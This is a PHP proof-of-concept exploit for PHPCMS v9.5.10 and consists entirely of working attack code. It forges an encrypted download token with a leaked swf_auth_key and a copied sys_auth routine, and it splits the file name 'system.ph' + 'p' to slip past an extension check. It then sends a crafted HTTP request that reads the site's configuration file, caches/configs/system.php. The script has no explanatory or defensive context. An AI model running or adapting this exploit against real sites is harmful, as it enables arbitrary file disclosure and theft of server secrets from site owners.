<?php
$host = '127.0.0.1';
$root = '/phpcms_v9.5.10_GBK/';//如果网站在根目录，值为：/
$sess_id = '1439470602';
$swf_auth_key = '3c1d72bb58cb2f3186de97721fdbadf6';
$temp = 'i=360&d=360&t=360360360360360360&ip=127.0.0.1&m=360&modelid=360&s=caches/configs/system.ph&f=p';
$encode_str = sys_auth($temp, 'ENCODE', $swf_auth_key);
$path = $root.'index.php?m=content&c=down&a=download&a_k='.$encode_str;

$resp = get($host,$path,$sess_id);

echo $resp;

function get($host,$path,$sess_id){
	$fp = fsockopen($host,80);
	if(!$fp){
		return false;
	}else{
		$header  = "GET {$path} HTTP/1.1\r\n";
		$header .= "Host: {$host}\r\n";
		$header .= "User-Agent: {$sess_id}\r\n"; 
		$header .= "X-Forwarded-For: 127.0.0.1\r\n";
		$header .= "Connection: Close\r\n\r\n";
		fwrite($fp, $header);
		$resp = '';
		while (!feof($fp)) {
			$resp .= fgets($fp, 4096);
		}
		fclose($fp);  
		return $resp;
	}
}
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
	$ckey_length = 4;
	$key = md5($key != '' ? $key : '');
	$keya = md5(substr($key, 0, 16));
	$keyb = md5(substr($key, 16, 16));
	$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

	$cryptkey = $keya.md5($keya.$keyc);
	$key_length = strlen($cryptkey);

	$string = $operation == 'DECODE' ? base64_decode(strtr(substr($string, $ckey_length), '-_', '+/')) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
	$string_length = strlen($string);

	$result = '';
	$box = range(0, 255);

	$rndkey = array();
	for($i = 0; $i <= 255; $i++) {
		$rndkey[$i] = ord($cryptkey[$i % $key_length]);
	}

	for($j = $i = 0; $i < 256; $i++) {
		$j = ($j + $box[$i] + $rndkey[$i]) % 256;
		$tmp = $box[$i];
		$box[$i] = $box[$j];
		$box[$j] = $tmp;
	}

	for($a = $j = $i = 0; $i < $string_length; $i++) {
		$a = ($a + 1) % 256;
		$j = ($j + $box[$a]) % 256;
		$tmp = $box[$a];
		$box[$a] = $box[$j];
		$box[$j] = $tmp;
		$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
	}

	if($operation == 'DECODE') {
		if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
			return substr($result, 26);
		} else {
			return '';
		}
	} else {
		return $keyc.rtrim(strtr(base64_encode($result), '+/', '-_'), '=');
	}
}
?>